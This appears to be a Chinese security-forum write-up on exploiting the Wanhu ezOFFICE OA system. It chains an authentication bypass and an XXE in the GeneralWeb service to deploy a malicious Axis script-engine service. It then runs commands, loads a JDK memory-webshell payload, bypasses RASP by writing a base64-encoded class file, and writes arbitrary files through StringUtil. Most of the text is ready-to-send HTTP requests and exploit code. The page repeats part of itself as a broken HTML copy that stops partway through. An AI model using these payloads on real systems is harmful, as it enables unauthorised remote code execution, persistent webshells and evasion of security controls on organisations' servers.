使用的是 getRequestURI那么就有很多绕过方法了简单列举几个
```php
/iWebOfficeSign/OfficeServer.jsp/../../
/xfservices/./GeneralWeb
.jsp;.js
```
漏洞利用
----
触发dnslog
```php
POST /defaultroot/xfservices/./GeneralWeb HTTP/1.1
Host:
User-Agent: Moziilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Content-Type: text/xml;charset=UTF-8
SOAPAction:
Content-Length: 457
&lt;soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:gen="http://com.whir.service/GeneralWeb"&gt;
&lt;soapenv:Body&gt;
&lt;gen:OAManager&gt;
&lt;gen:input&gt;
&amp;lt;?xml version="1.0" encoding="UTF-8"?&amp;gt;
&amp;lt;!DOCTYPE root [
&amp;lt;!ENTITY x SYSTEM "http://123.6x9ryk.dnslog.cn"&amp;gt;]&amp;gt;
&amp;lt;root&amp;gt;&amp;amp;x;&amp;lt;/root&amp;gt;
&lt;/gen:input&gt;
&lt;/gen:OAManager&gt;
&lt;/soapenv:Body&gt;
&lt;/soapenv:Envelope&gt;
```
因为使用了Axis我们可以通过AdminServlet创建任意服务看到server-config.wsdd
```xml
&lt;service name="AdminService" provider="java:MSG"&gt;
&lt;parameter name="allowedMethods" value="AdminService"/&gt;
&lt;parameter name="enableRemoteAdmin" value="false"/&gt;
&lt;parameter name="className" value="org.apache.axis.utils.Admin"/&gt;
&lt;namespace&gt;http://xml.apache.org/axis/wsdd/&lt;/namespace&gt;
&lt;/service&gt;
```
那么思路就很清晰了通过xxe的get请求部署恶意服务由于JDK是低版本那么可以部署RhinoScriptEngineService
```xml
http://127.0.0.1:{{Port}}/defaultroot/services/./AdminService?method=!--%3E%3Cdeployment%20xmlns%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22%20xmlns%3Ajava%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2Fproviders%2Fjava%22%3E%3Cservice%20name%3D%22RhinoScriptEngineService%22%20provider%3D%22java%3ARPC%22%3E%3Cparameter%20name%3D%22className%22%20value%3D%22com.sun.script.javascript.RhinoScriptEngine%22%20%2F%3E%3Cparameter%20name%3D%22allowedMethods%22%20value%3D%22eval%22%20%2F%3E%3CtypeMapping%20deserializer%3D%22org.apache.axis.encoding.ser.BeanDeserializerFactory%22%20type%3D%22java%3Ajavax.script.SimpleScriptContext%22%20qname%3D%22ns%3ASimpleScriptContext%22%20serializer%3D%22org.apache.axis.encoding.ser.BeanSerializerFactory%22%20xmlns%3Ans%3D%22urn%3Abeanservice%22%20regenerateElement%3D%22false%22%3E%3C%2FtypeMapping%3E%3C%2Fservice%3E%3C%2Fdeployment
```
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-933bab13bb758e5a40d3c7a1bdcffcb882bba84b.png)
部署成功
```php
POST /defaultroot/services/./RhinoScriptEngineService HTTP/1.1
Host:
User-Agent: Moziilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Content-Type: text/xml;charset=UTF-8
SOAPAction:
Content-Length: 973
&lt;soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:jav="http://javascript.script.sun.com"&gt;
&lt;soapenv:Body&gt;
&lt;eval xmlns="http://127.0.0.1:8080/services/scriptEngine"&gt;
&lt;arg0 xmlns=""&gt;
&lt;![CDATA[
try {
load("nashorn:Moziilla_compat.js");
} catch (e) {
}
importPackage(Packages.java.io);
importPackage(Packages.java.lang);
importPackage(Packages.java.util);
var command = "cmd /c whoami";
var pb = new java.lang.ProcessBuilder(Arrays.asList(command.split(" ")));
var process = pb.start();
var ret = new java.util.Scanner(process.getInputStream()).useDelimiter('\\A').next();
ret;
]]&gt;
&lt;/arg0&gt;
&lt;arg1 xmlns="" xsi:type="urn:SimpleScriptContext" xmlns:urn="urn:beanservice"&gt;
&lt;/arg1&gt;
&lt;/eval&gt;
&lt;/soapenv:Body&gt;
&lt;/soapenv:Envelope&gt;
```
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-30d99a7f51736e83f9db2a190628914f5a45c840.png)
成功执行命令
### 内存马
Java-Js-Engine-Payloads&lt;https://github.com/yzddmr6/Java-Js-Engine-Payloads&gt;
适配了JDK6-14的内存马
```java
try {
load("nashorn:mozilla_compat.js");
} catch (e) {
}
function getUnsafe() {
var theUnsafeMethod =
java.lang.Class.forName("sun.misc.Unsafe").getDeclaredField("theUnsafe");
theUnsafeMethod.setAccessible(true);
return theUnsafeMethod.get(null);
}
function removeClassCache(clazz) {
var unsafe = getUnsafe();
var clazzAnonymousClass = unsafe.defineAnonymousClass(
clazz,
java.lang.Class.forName("java.lang.Class")
.getResourceAsStream("Class.class")
.readAllBytes(),
null
);
var reflectionDataField =
clazzAnonymousClass.getDeclaredField("reflectionData");
unsafe.putObject(clazz, unsafe.objectFieldOffset(reflectionDataField), null);
}
function bypassReflectionFilter() {
var reflectionClass;
try {
reflectionClass = java.lang.Class.forName(
"jdk.internal.reflect.Reflection"
);
} catch (error) {
reflectionClass = java.lang.Class.forName("sun.reflect.Reflection");
}
var unsafe = getUnsafe();
var classBuffer = reflectionClass
.getResourceAsStream("Reflection.class")
.readAllBytes();
var reflectionAnonymousClass = unsafe.defineAnonymousClass(
reflectionClass,
classBuffer,
null
);
var fieldFilterMapField =
reflectionAnonymousClass.getDeclaredField("fieldFilterMap");
var methodFilterMapField =
reflectionAnonymousClass.getDeclaredField("methodFilterMap");
if (
fieldFilterMapField
.getType()
.isAssignableFrom(java.lang.Class.forName("java.util.HashMap"))
) {
unsafe.putObject(
reflectionClass,
unsafe.staticFieldOffset(fieldFilterMapField),
java.lang.Class.forName("java.util.HashMap")
.getConstructor()
.newInstance()
);
}
if (
methodFilterMapField
.getType()
.isAssignableFrom(java.lang.Class.forName("java.util.HashMap"))
) {
unsafe.putObject(
reflectionClass,
unsafe.staticFieldOffset(methodFilterMapField),
java.lang.Class.forName("java.util.HashMap")
.getConstructor()
.newInstance()
);
}
removeClassCache(java.lang.Class.forName("java.lang.Class"));
}
function setAccessible(accessibleObject) {
var unsafe = getUnsafe();
var overrideField = java.lang.Class.forName(
"java.lang.reflect.AccessibleObject"
).getDeclaredField("override");
var offset = unsafe.objectFieldOffset(overrideField);
unsafe.putBoolean(accessibleObject, offset, true);
}
function defineClass(bytes) {
var clz = null;
var version = java.lang.System.getProperty("java.version");
var unsafe = getUnsafe();
var classLoader = new java.net.URLClassLoader(
java.lang.reflect.Array.newInstance(
java.lang.Class.forName("java.net.URL"),
0
)
);
try {
if (version.split(".")[0] &amp;gt;= 11) {
bypassReflectionFilter();
defineClassMethod = java.lang.Class.forName(
"java.lang.ClassLoader"
).getDeclaredMethod(
"defineClass",
java.lang.Class.forName("[B"),
java.lang.Integer.TYPE,
java.lang.Integer.TYPE
);
setAccessible(defineClassMethod);
clz = defineClassMethod.invoke(classLoader, bytes, 0, bytes.length);
} else {
var protectionDomain = new java.security.ProtectionDomain(
new java.security.CodeSource(
null,
java.lang.reflect.Array.newInstance(
java.lang.Class.forName("java.security.cert.Certificate"),
0
)
),
null,
classLoader,
[]
);
clz = unsafe.defineClass(
null,
bytes,
0,
bytes.length,
classLoader,
protectionDomain
);
}
} catch (error) {
error.printStackTrace();
} finally {
return clz;
}
}
function base64DecodeToByte(str) {
var bt;
try {
bt = java.lang.Class.forName("sun.misc.BASE64Decoder").newInstance().decodeBuffer(str);
} catch (e) {
bt = java.lang.Class.forName("java.util.Base64").newInstance().getDecoder().decode(str);
}
return bt;
}
clz = defineClass(base64DecodeToByte(code));
clz.newInstance();
```
由于JBoss 低版本套的是 tomcat所以直接使用 tomcat 内存马即可
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-87ab87fce34e7e41b93767a4a479fcbcd37b3f8a.png)
使用Listener组件容错高
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-c1ea2c55639e04a5643b94defd04fd15cadbae59.png)
执行,无报错并且返回 200说明成功了
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-24153a68c8d45034111bcc9bd3656df5280b0148.png)
随便找个路径连接即可
### RASP绕过
在命令执行的时候可能会遇到:**java.lang.SecurityException: cmd execute denied !!!**
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-4c237161525299a4b84664bcfc5e228953a77419.png)
即存在RASP而RASP一般是通过黑名单进行过滤的
这里禁用了ProcessBuilder我们尝试更底层的命令执行ProcessImpl该类是private所以只能反射调用
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-350f2ffdee079101528ae6f4106f34e2e2e5792b.png)
这里JDK1.6和JDK1.8的构造方法存在差异,所以需要小小修改一下
当调用setAccessible的时候会报错
```php
sun.org.mozilla.javascript.internal.EcmaError: TypeError: Cannot call method "setAccessible" of null
```
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-72f5ac149880b8a2ce93a7b044c47067ab32102c.png)
在js中无法反射调用根据网上的文章我们可以写class文件然后URLClassLoader去加载
```java
import java.io.ByteArrayOutputStream;
import java.io.InputStream;
import java.lang.reflect.Method;
import java.util.Map;
public class Testcmd {
String result = "";
public Testcmd(String paramString) throws Exception{
boolean isLinux = true;
String osTyp = System.getProperty("os.name");
if (osTyp != null &amp;amp;&amp;amp; osTyp.toLowerCase().contains("win")) {
isLinux = false;
}
String[] cmds = isLinux ? new String[]{"bash", "-c", paramString} : new String[]{"cmd.exe", "/c", paramString};
Class clazz = Class.forName("java.lang.ProcessImpl");
Method method = clazz.getDeclaredMethod("start", String[].class, Map.class,String.class,boolean.class);
method.setAccessible(true);
InputStream ins = ((Process) method.invoke(null,cmds,null,null,true)).getInputStream();
ByteArrayOutputStream bos = new ByteArrayOutputStream();
byte[] bytes = new byte[1024];
int size;
while((size = ins.read(bytes)) &amp;gt; 0)
bos.write(bytes,0,size);
ins.close();
this.result = bos.toString();
}
public java.lang.String toString() {
return this.result;
}
public static void main(String[] args) {
}
}
```
没有ban掉File类可以将class文件写入到系统中
```java
try {
load("nashorn:Moziilla_compat.js");
} catch (e) {
}
importPackage(Packages.java.io);
importPackage(Packages.java.lang);
importPackage(Packages.sun.misc);
var file = new File("../server/Testcmd.class");
var fos = new FileOutputStream(file);
var base64Decoder = new BASE64Decoder();
var decodeContent = base64Decoder.decodeBuffer("yv66vgAAADIAkAoAFwBPCABQCQAiAFEIAFIKAFMAVAoACQBVCABWCgAJAFcHAFgIAFkIAFoIAFsIAFwIAF0KABEAXggAXwcAYAcAMQcAYQkAYgBjCgARAGQKAGUAZgcAZwoAYgBoCgBlAGkHAGoKABoAawcAbAoAHABPCgBtAG4KABwAbwoAbQBwCgAcAHEHAHIBAAZyZXN1bHQBABJMamF2YS9sYW5nL1N0cmluZzsBAAY8aW5pdD4BABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEACUxUZXN0Y21kOwEAC3BhcmFtU3RyaW5nAQAHaXNMaW51eAEAAVoBAAVvc1R5cAEABGNtZHMBABNbTGphdmEvbGFuZy9TdHJpbmc7AQAFY2xhenoBABFMamF2YS9sYW5nL0NsYXNzOwEABm1ldGhvZAEAGkxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQADaW5zAQAVTGphdmEvaW8vSW5wdXRTdHJlYW07AQADYm9zAQAfTGphdmEvaW8vQnl0ZUFycmF5T3V0cHV0U3RyZWFtOwEABWJ5dGVzAQACW0IBAARzaXplAQABSQEADVN0YWNrTWFwVGFibGUHAHIHAFgHAGAHAHMHAHQHAGwHADsBAApFeGNlcHRpb25zBwB1AQAIdG9TdHJpbmcBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEABG1haW4BABYoW0xqYXZhL2xhbmcvU3RyaW5nOylWAQAEYXJncwEAClNvdXJjZUZpbGUBACFUZXN0Y21kLmphdmEgZnJvbSBJbnB1dEZpbGVPYmplY3QMACUAdgEAAAwAIwAkAQAHb3MubmFtZQcAdwwAeAB5DAB6AEkBAAN3aW4MAHsAfAEAEGphdmEvbGFuZy9TdHJpbmcBAARiYXNoAQACLWMBAAdjbWQuZXhlAQACL2MBABVqYXZhLmxhbmcuUHJvY2Vzc0ltcGwMAH0AfgEABXN0YXJ0AQAPamF2YS9sYW5nL0NsYXNzAQANamF2YS91dGlsL01hcAcAfwwAgAAzDACBAIIHAHMMAIMAhAEAEGphdmEvbGFuZy9PYmplY3QMAIUAhgwAhwCIAQARamF2YS9sYW5nL1Byb2Nlc3MMAIkAigEAHWphdmEvaW8vQnl0ZUFycmF5T3V0cHV0U3RyZWFtBwB0DACLAIwMAI0AjgwAjwB2DABIAEkBAAdUZXN0Y21kAQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kAQATamF2YS9pby9JbnB1dFN0cmVhbQEAE2phdmEvbGFuZy9FeGNlcHRpb24BAAMoKVYBABBqYXZhL2xhbmcvU3lzdGVtAQALZ2V0UHJvcGVydHkBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEAC3RvTG93ZXJDYXNlAQAIY29udGFpbnMBABsoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7KVoBAAdmb3JOYW1lAQAlKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL0NsYXNzOwEAEWphdmEvbGFuZy9Cb29sZWFuAQAEVFlQRQEAEWdldERlY2xhcmVkTWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEADXNldEFjY2Vzc2libGUBAAQoWilWAQAHdmFsdWVPZgEAFihaKUxqYXZhL2xhbmcvQm9vbGVhbjsBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAEcmVhZAEABShbQilJAQAFd3JpdGUBAAcoW0JJSSlWAQAFY2xvc2UAIQAiABcAAAABAAAAIwAkAAAAAwABACUAJgACACcAAAH5AAYACwAAAOIqtwABKhICtQADBD0SBLgABU4txgARLbYABhIHtgAImQAFAz0cmQAYBr0ACVkDEgpTWQQSC1NZBStTpwAVBr0ACVkDEgxTWQQSDVNZBStTOgQSDrgADzoFGQUSEAe9ABFZAxMAElNZBBMAE1NZBRMACVNZBrIAFFO2ABU6BhkGBLYAFhkGAQe9ABdZAxkEU1kEAVNZBQFTWQYEuAAYU7YAGcAAGrYAGzoHuwAcWbcAHToIEQQAvAg6CRkHGQm2AB5ZNgqeABAZCBkJAxUKtgAfp//pGQe2ACAqGQi2ACG1AAOxAAAAAwAoAAAASgASAAAACAAEAAcACgAJAAwACgASAAsAIgAMACQADgBRABAAWAARAH0AEgCDABMAqQAUALIAFQC5ABcAxgAYANMAGgDYABsA4QAcACkAAABwAAsAAADiACoAKwAAAAAA4gAsACQAAQAMANYALQAuAAIAEgDQAC8AJAADAFEAkQAwADEABABYAIoAMgAzAAUAfQBlADQANQAGAKkAOQA2ADcABwCyADAAOAA5AAgAuQApADoAOwAJAMMAHwA8AD0ACgA+AAAAPwAF/wAkAAQHAD8HAEABBwBAAAAYUQcAEv8AaQAKBwA/BwBAAQcAQAcAEgcAQQcAQgcAQwcARAcARQAA/AAZAQBGAAAABAABAEcAAQBIAEkAAQAnAAAALwABAAEAAAAFKrQAA7AAAAACACgAAAAGAAEAAAAeACkAAAAMAAEAAAAFACoAKwAAAAkASgBLAAEAJwAAACsAAAABAAAAAbEAAAACACgAAAAGAAEAAAAiACkAAAAMAAEAAAABAEwAMQAAAAEATQAAAAIATg==");
fos.write(decodeContent, new Integer(0), new Integer(decodeContent.length));
fos.close();
```
最后就是网上公开的poc了
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-f4332d108c30507b1bfcbddd2005290a822b0cbf.png)
### StringUtil任意文件写
网上还存在一种方法:使用`com.whir.ezoffice.ezform.util.StringUtil`这个类写文件
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-fc12c86d40e331cd3ebfb1b6fca156c6ce9e0d9b.png)
存在无参构造方法满足service条件
```java
private static void writeToFile(String fileName, String content) throws IOException {
BufferedOutputStream outStream = null;
OutputStreamWriter writer = null;
try {
String dirPath = "";
if (fileName.lastIndexOf("/") != -1) {
dirPath = fileName.substring(0, fileName.lastIndexOf("/"));
}
File dir = new File(dirPath);
if (!dir.exists() &amp;amp;&amp;amp; !dir.mkdirs()) {
throw new IOException("create directory '" + dirPath + "' failed!");
}
outStream = new BufferedOutputStream(new FileOutputStream(fileName, true));
writer = new OutputStreamWriter(outStream);
writer.write(content);
} catch (IOException var9) {
throw var9;
} finally {
if (writer != null) {
writer.close();
}
if (outStream != null) {
outStream.close();
}
}
}
public static void printToFile(String fileName, String content) throws IOException {
writeToFile(fileName, content);
}
public static void printlnToFile(String fileName, String content) throws IOException {
writeToFile(fileName, content + "\n");
}
```
可以通过 printToFile 方法任意文件写,内容以及文件名均可控
```php
http://127.0.0.1:{{port}}/defaultroot/services/./AdminService?method=!--%3E%3Cdeployment%20xmlns=%22http://xml.apache.org/axis/wsdd/%22%20xmlns:java=%22http://xml.apache.org/axis/wsdd/providers/java%22%3E%3Cservice%20name=%22freemarkerQa%22%20provider=%22java:RPC%22%3E%3Cparameter%20name=%22className%22%20value=%22com.whir.ezoffice.ezform.util.StringUtil%22/%3E%3Cparameter%20name=%22allowedMethods%22%20value=%22*%22/%3E%3C/service%3E%3C/deployment
```
网上众多的 freemarkerQa 服务均是调用的该类
```php
POST /defaultroot/./services/freemarkerQa HTTP/1.1
Host:
User-Agent: Moziilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
SOAPAction:
Content-Type: text/xml;charset=UTF-8
Content-Length: 606
&lt;soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:util="http://util.ezform.ezoffice.whir.com"&gt;
&lt;soapenv:Body&gt;
&lt;util:printToFile soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"&gt;
&lt;fileName xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"&gt;../server/oa/deploy/defaultroot.war/1.txt&lt;/fileName&gt;
&lt;content xsi:type="soapenc:string"&gt;x&lt;/content&gt;
&lt;/util:printToFile&gt;
&lt;/soapenv:Body&gt;
&lt;/soapenv:Envelope&gt;
```
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-2f970068174235f1ffd981ed0d0d245886092c89.png)
验证成功
总结
--
实战中很有意思的一个漏洞但网上的poc。。。呃呃
还可以尝试打freemarker、bsh
万户作为老牌oa还是很值得去学习研究的
参考:
[万户rce](https://mp.weixin.qq.com/s/sktnBnCrZUoqkhGM0O9HRQ)
[实战 | 万户GeneralWeb组合Bypass Rasp](https://mp.weixin.qq.com/s/4FyX_zmY90yGLzdJgUGzcg)</textarea>
<div id=layer-photos-demo>
<div id=md_view><div class=markdown-body><p blockindex=0><img src=
之前实战遇到了但是网上的poc懂得都懂索性就专门研究一下</p>
<p blockindex=1>JDK版本1.6.0<br>
操作系统Windows Server 2012</p>
<h2 blockindex=2>漏洞分析</h2>
<p blockindex=3>从web.xml看起</p>
<p blockindex=4><img src="
<p blockindex=5>使用了 XFire 与 Axis 两种 WebService 框架</p>
<p blockindex=6>看到 XFire 配置文件<code>D:/jboss/jboss-as/server/oa/deploy/defaultroot.war/WEB-INF/classes/META-INF/xfire/services.xml</code></p>
<p blockindex=7><img src=
<p blockindex=8>配置了一个GeneralWeb的服务找到该类<code>com.whir.service.webservice.GeneralWeb</code></p>
<pre blockindex=9><code class="hljs language-java"><span class=hljs-keyword>package</span> com.whir.service.webservice;
<span class=hljs-keyword>import</span> com.whir.service.common.CallApi;
<span class=hljs-keyword>public</span> <span class=hljs-class><span class=hljs-keyword>class</span> <span class=hljs-title>GeneralWeb</span> </span>{
<span class=hljs-function><span class=hljs-keyword>public</span> String <span class=hljs-title>OAManager</span><span class=hljs-params>(String input)</span> <span class=hljs-keyword>throws</span> Exception </span>{
CallApi callapi = <span class=hljs-keyword>new</span> CallApi();
<span class=hljs-keyword>return</span> callapi.getResult(input);
}
}
</code></pre>
<p blockindex=10><code>com.whir.service.common.CallApi#getResult</code></p>
<pre blockindex=11><code class="hljs language-java"><span class=hljs-function><span class=hljs-keyword>public</span> String <span class=hljs-title>getResult</span><span class=hljs-params>(String input)</span> <span class=hljs-keyword>throws</span> Exception </span>{
<span class=hljs-keyword>if</span> (serviceMap == <span class=hljs-keyword>null</span>) {
<span class=hljs-keyword>throw</span> <span class=hljs-keyword>new</span> Exception(<span class=hljs-string>"Error: serviceMap can not is null"</span>);
}
SAXBuilder builder = <span class=hljs-keyword>new</span> SAXBuilder();
<span class=hljs-keyword>byte</span>[] b = input.getBytes(<span class=hljs-string>"utf-8"</span>);
InputStream is = <span class=hljs-keyword>new</span> ByteArrayInputStream(b);
Document doc = builder.build(is);
Element root = doc.getRootElement();
</code></pre>
<p blockindex=12>使用SAXBuilder进行解析并且未进行过滤产生XXE漏洞</p>
<p blockindex=13>鉴权方面代码在<code>com.whir.common.util.SetCharacterEncodingFilter</code></p>
<p blockindex=14><img src="
<p blockindex=15>使用的是 getRequestURI那么就有很多绕过方法了简单列举几个</p>
<pre blockindex=16><code class="hljs language-php">/iWebOfficeSign/OfficeServer.jsp/../../
/xfservices/./GeneralWeb
.jsp;.js
</code></pre>
<h2 blockindex=17>漏洞利用</h2>
<p blockindex=18>触发dnslog</p>
<pre blockindex=19><code class="hljs language-php">POST /defaultroot/xfservices/./GeneralWeb HTTP/<span class=hljs-number>1.1</span>
Host:
User-Agent: Moziilla/<span class=hljs-number>5.0</span> (Linux; U; Android <span class=hljs-number>2.3</span>.<span class=hljs-number>6</span>; en-us; Nexus S Build/GRK39F) AppleWebKit/<span class=hljs-number>533.1</span> (KHTML, like Gecko) Version/<span class=hljs-number>4.0</span> Mobile Safari/<span class=hljs-number>533.1</span>
Content-Type: text/xml;charset=UTF-<span class=hljs-number>8</span>
SOAPAction:
Content-Length: <span class=hljs-number>457</span>
&lt;soapenv:Envelope xmlns:soapenv=<span class=hljs-string>"http://schemas.xmlsoap.org/soap/envelope/"</span> xmlns:gen=<span class=hljs-string>"http://com.whir.service/GeneralWeb"</span>&gt;
&lt;soapenv:Body&gt;
&lt;gen:OAManager&gt;
&lt;gen:input&gt;
&amp;lt;?xml version=<span class=hljs-string>"1.0"</span> encoding=<span class=hljs-string>"UTF-8"</span>?&amp;gt;
&amp;lt;!DOCTYPE root [
&amp;lt;!ENTITY x SYSTEM <span class=hljs-string>"http://123.6x9ryk.dnslog.cn"</span>&amp;gt;]&amp;gt;
&amp;lt;root&amp;gt;&amp;amp;x;&amp;lt;/root&amp;gt;
&lt;/gen:input&gt;
&lt;/gen:OAManager&gt;
&lt;/soapenv:Body&gt;
&lt;/soapenv:Envelope&gt;
</code></pre>
<p blockindex=20>因为使用了Axis我们可以通过AdminServlet创建任意服务看到server-config.wsdd</p>
<pre blockindex=21><code class="hljs language-xml"><span class=hljs-tag>&lt;<span class=hljs-name>service</span> <span class=hljs-attr>name</span>=<span class=hljs-string>"AdminService"</span> <span class=hljs-attr>provider</span>=<span class=hljs-string>"java:MSG"</span>&gt;</span>
<span class=hljs-tag>&lt;<span class=hljs-name>parameter</span> <span class=hljs-attr>name</span>=<span class=hljs-string>"allowedMethods"</span> <span class=hljs-attr>value</span>=<span class=hljs-string>"AdminService"</span>/&gt;</span>
<span class=hljs-tag>&lt;<span class=hljs-name>parameter</span> <span class=hljs-attr>name</span>=<span class=hljs-string>"enableRemoteAdmin"</span> <span class=hljs-attr>value</span>=<span class=hljs-string>"false"</span>/&gt;</span>
<span class=hljs-tag>&lt;<span class=hljs-name>parameter</span> <span class=hljs-attr>name</span>=<span class=hljs-string>"className"</span> <span class=hljs-attr>value</span>=<span class=hljs-string>"org.apache.axis.utils.Admin"</span>/&gt;</span>
<span class=hljs-tag>&lt;<span class=hljs-name>namespace</span>&gt;</span>http://xml.apache.org/axis/wsdd/<span class=hljs-tag>&lt;/<span class=hljs-name>namespace</span>&gt;</span>
<span class=hljs-tag>&lt;/<span class=hljs-name>service</span>&gt;</span>
</code></pre>
<p blockindex=22>那么思路就很清晰了通过xxe的get请求部署恶意服务由于JDK是低版本那么可以部署RhinoScriptEngineService</p>
<pre blockindex=23><code class="hljs language-xml">http://127.0.0.1:{{Port}}/defaultroot/services/./AdminService?method=!--%3E%3Cdeployment%20xmlns%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22%20xmlns%3Ajava%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2Fproviders%2Fjava%22%3E%3Cservice%20name%3D%22RhinoScriptEngineService%22%20provider%3D%22java%3ARPC%22%3E%3Cparameter%20name%3D%22className%22%20value%3D%22com.sun.script.javascript.RhinoScriptEngine%22%20%2F%3E%3Cparameter%20name%3D%22allowedMethods%22%20value%3D%22eval%22%20%2F%3E%3CtypeMapping%20deserializer%3D%22org.apache.axis.encoding.ser.BeanDeserializerFactory%22%20type%3D%22java%3Ajavax.script.SimpleScriptContext%22%20qname%3D%22ns%3ASimpleScriptContext%22%20serializer%3D%22org.apache.axis.encoding.ser.BeanSerializerFactory%22%20xmlns%3Ans%3D%22urn%3Abeanservice%22%20regenerateElement%3D%22false%22%3E%3C%2FtypeMapping%3E%3C%2Fservice%3E%3C%2Fdeployment
</code></pre>
<p blockindex=24><img src="
<p blockindex=25>部署成功</p>
<pre blockindex=26><code class="hljs language-php">POST /defaultroot/services/./RhinoScriptEngineService HTTP/<span class=hljs-number>1.1</span>
Host:
User-Agent: Moziilla/<span class=hljs-number>5.0</span> (Linux; U; Android <span class=hljs-number>2.3</span>.<span class=hljs-number>6</span>; en-us; Nexus S Build/GRK39F) AppleWebKit/<span class=hljs-number>533.1</span> (KHTML, like Gecko) Version/<span class=hljs-number>4.0</span> Mobile Safari/<span class=hljs-number>533.1</span>
Content-Type: text/xml;charset=UTF-<span class=hljs-number>8</span>
SOAPAction:
Content-Length: <span class=hljs-number>973</span>
&lt;soapenv:Envelope xmlns:xsi=<span class=hljs-string>"http://www.w3.org/2001/XMLSchema-instance"</span> xmlns:xsd=<span class=hljs-string>"http://www.w3.org/2001/XMLSchema"</span> xmlns:soapenv=<span class=hljs-string>"http://schemas.xmlsoap.org/soap/envelope/"</span> xmlns:jav=<span class=hljs-string>"http://javascript.script.sun.com"</span>&gt;
&lt;soapenv:Body&gt;
&lt;<span class=hljs-keyword>eval</span> xmlns=<span class=hljs-string>"http://127.0.0.1:8080/services/scriptEngine"</span>&gt;
&lt;arg0 xmlns=<span class=hljs-string>""</span>&gt;
&lt;![CDATA[
<span class=hljs-keyword>try</span> {
load(<span class=hljs-string>"nashorn:Moziilla_compat.js"</span>);
} <span class=hljs-keyword>catch</span> (e) {
}
importPackage(Packages.java.io);
importPackage(Packages.java.lang);
importPackage(Packages.java.util);
<span class=hljs-keyword>var</span> command = <span class=hljs-string>"cmd /c whoami"</span>;
<span class=hljs-keyword>var</span> pb = <span class=hljs-keyword>new</span> java.lang.ProcessBuilder(Arrays.asList(command.split(<span class=hljs-string>" "</span>)));
<span class=hljs-keyword>var</span> process = pb.start();
<span class=hljs-keyword>var</span> ret = <span class=hljs-keyword>new</span> java.util.Scanner(process.getInputStream()).useDelimiter(<span class=hljs-string>'\\A'</span>).next();
ret;
]]&gt;
&lt;/arg0&gt;
&lt;arg1 xmlns=<span class=hljs-string>""</span> xsi:type=<span class=hljs-string>"urn:SimpleScriptContext"</span> xmlns:urn=<span class=hljs-string>"urn:beanservice"</span>&gt;
&lt;/arg1&gt;
&lt;/<span class=hljs-keyword>eval</span>&gt;
&lt;/soapenv:Body&gt;
&lt;/soapenv:Envelope&gt;
</code></pre>
<p blockindex=27><img src=
<p blockindex=28>成功执行命令</p>
<h3 blockindex=29>内存马</h3>
<p blockindex=30>Java-Js-Engine-Payloads<a href=https://github.com/yzddmr6/Java-Js-Engine-Payloads>https://github.com/yzddmr6/Java-Js-Engine-Payloads</a></p>
<p blockindex=31>适配了JDK6-14的内存马</p>
<pre blockindex=32><code class="hljs language-java"><span class=hljs-keyword>try</span> {
load(<span class=hljs-string>"nashorn:mozilla_compat.js"</span>);
} <span class=hljs-keyword>catch</span> (e) {
}
<span class=hljs-function>function <span class=hljs-title>getUnsafe</span><span class=hljs-params>()</span> </span>{
<span class=hljs-keyword>var</span> theUnsafeMethod =
java.lang.Class.forName(<span class=hljs-string>"sun.misc.Unsafe"</span>).getDeclaredField(<span class=hljs-string>"theUnsafe"</span>);
theUnsafeMethod.setAccessible(<span class=hljs-keyword>true</span>);
<span class=hljs-keyword>return</span> theUnsafeMethod.get(<span class=hljs-keyword>null</span>);
}
